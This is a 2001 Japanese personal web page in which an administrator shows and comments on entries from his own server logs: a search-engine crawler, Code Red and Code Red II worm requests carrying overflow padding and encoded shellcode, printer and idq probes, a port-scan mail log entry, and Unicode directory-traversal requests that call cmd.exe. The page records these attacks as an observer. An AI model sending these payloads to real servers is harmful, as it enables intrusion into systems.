アクセスログ
・検索エンジンが参照してきたログ(心情的には気持ち良いものでは無いけれど・・・)
tcp.ip.add.res - - [01/Aug/2001:00:06:41 +0900] "GET /robots.txt HTTP/1.0" 200 93 "-"
"Lycos_Spider_(T-Rex)"
・「codered」に感染したサーバーからは下記のようなアクセスがあります。
tcp.ip.add.res - - [01/Aug/2001:09:00:05 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78
01%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 324
"-""-"
・よく判らないアクセスその1
tcp.ip.add.res - - [03/Aug/2001:17:01:50 +0900] "GET /NULL.printer" 404 369 "-" "-"
・よく判らないアクセスその2
tcp.ip.add.res - - [04/Aug/2001:02:39:54 +0900] "GET /NULL.idq" 404 369 "-" "-"
・「codered2」でしょうか? 変種が発生したようです。(ココ最近のログはこの様な物で一杯です)
tcp.ip.add.res - - [04/Aug/2001:21:21:02 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 369
・ポートスキャンが行われた場合メールログには、下記のようなログが残ってる。
isv sendmail[10002]: NOQUEUE: xxx.xxx.com [tcp.ip.add.res]
(may be forged) did not issue MAIL/EXPN/VRFY/ETRN during connection to Daemon0
・何なんでしょう? これらを野放しにしてる管理者様「早く気が付いてくれ〜」です。
(日本国内のケーブルテレビ、OCNの/28のサーバーが多いようですね)
tcp.ip.add.res - - [19/Sep/2001:00:14:34 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 369
tcp.ip.add.res - - [19/Sep/2001:00:14:38 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 369
tcp.ip.add.res - - [19/Sep/2001:00:14:39 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 369
Home
Sep.2001 K.Hirai